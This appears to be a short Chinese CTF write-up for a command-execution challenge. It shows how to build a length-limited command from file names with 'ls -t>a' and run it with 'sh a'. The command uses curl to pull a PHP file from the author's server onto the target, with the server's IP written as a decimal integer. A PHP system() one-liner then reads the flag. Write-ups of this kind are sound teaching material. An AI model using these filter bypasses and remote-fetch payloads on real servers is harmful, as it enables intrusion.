天天看點

CTF-Rcee指令執行-Wp

CTF-Rcee-WP

這個題目挺考驗你的積累與耐心哈哈哈

我表示重新開機環境十幾次才做好

題目代碼

CTF-Rcee指令執行-Wp

考點

這裡考點是:ls -t>a續行來突破限制

我是在vps上建立一個檔案,然後利用ip轉換成其他進制來達到目的

CTF-Rcee指令執行-Wp

把curl 2033630300 >1.php利用ls -t >a寫入a檔案,然後再利用sh a執行指令

CTF-Rcee指令執行-Wp

可以發現我們vps的檔案内容已經被目标機器寫入了a.php

CTF-Rcee指令執行-Wp

通路a.php看看

CTF-Rcee指令執行-Wp

神奇的東西哈哈哈哈哈哈,表示第一次做這種題目,很好玩

接下來就沒技術含量了

<?php system('cat /flag');?>

CTF-Rcee指令執行-Wp